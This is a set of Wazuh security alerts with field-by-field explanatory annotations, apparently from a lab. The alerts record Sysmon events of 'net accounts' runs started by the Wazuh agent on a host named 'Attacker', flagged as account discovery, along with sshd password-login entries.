rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 20 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534561.2254483 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:38.6904847Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290435 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:38.616
ProcessGuid: {94294ddc-be5e-680a-1f0c-000000000e00}
ProcessId: 16440
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00}
ParentProcessId: 16636
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:38.616 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5e-680a-1f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16440 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 16636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2259542 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:42.0654954Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290736 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:42.059
ProcessGuid: {94294ddc-be62-680a-200c-000000000e00}
ProcessId: 8592
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:42.059 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be62-680a-200c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2264775 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:42:45.773883+00:00 server1 sshd[3349]: pam_unix(sshd:session): session opened for user simba(uid=1000) by simba(uid=0) The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:42:45.773883+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: pam Parent decoder used – for nested parsing.
decoder.name: pam Name of the Wazuh decoder that parsed this raw log.
data.srcuser: simba User on the originating host – watch for root / SYSTEM used remotely.
data.dstuser: simba(uid=1000) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.uid: 0 Numeric user ID – pairs with username when name missing.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
agent.id: 000 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: server1 Hostname of the source machine. Handy when matching with AD or your CMDB.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534566.2265234 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
full_log: 2025-04-24T22:42:45.764776+00:00 server1 sshd[3349]: Accepted password for simba from 192.168.6.135 port 60874 ssh2 The complete raw log message before parsing – last‑resort truth for deep dives.
predecoder.program_name: sshd Process that originally wrote the log line (e.g., sshd, sudo).
predecoder.timestamp: 2025-04-24T22:42:45.764776+00:00 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
decoder.parent: sshd Parent decoder used – for nested parsing.
decoder.name: sshd Name of the Wazuh decoder that parsed this raw log.
data.srcip: 192.168.6.135 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.srcport: 60874 Source TCP/UDP port seen – can confirm outbound SMB / RDP, etc.
data.dstuser: simba No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: /var/log/auth.log Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2265701 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.0819453Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291045 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.074
ProcessGuid: {94294ddc-be63-680a-220c-000000000e00}
ProcessId: 8356
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be62-680a-200c-000000000e00}
ParentProcessId: 8592
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.074 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-220c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8356 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be62-680a-200c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2270752 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:43.1334158Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 291050 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:43.130
ProcessGuid: {94294ddc-be63-680a-230c-000000000e00}
ProcessId: 10588
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:43.130 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be63-680a-230c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10588 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534570.2275989 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
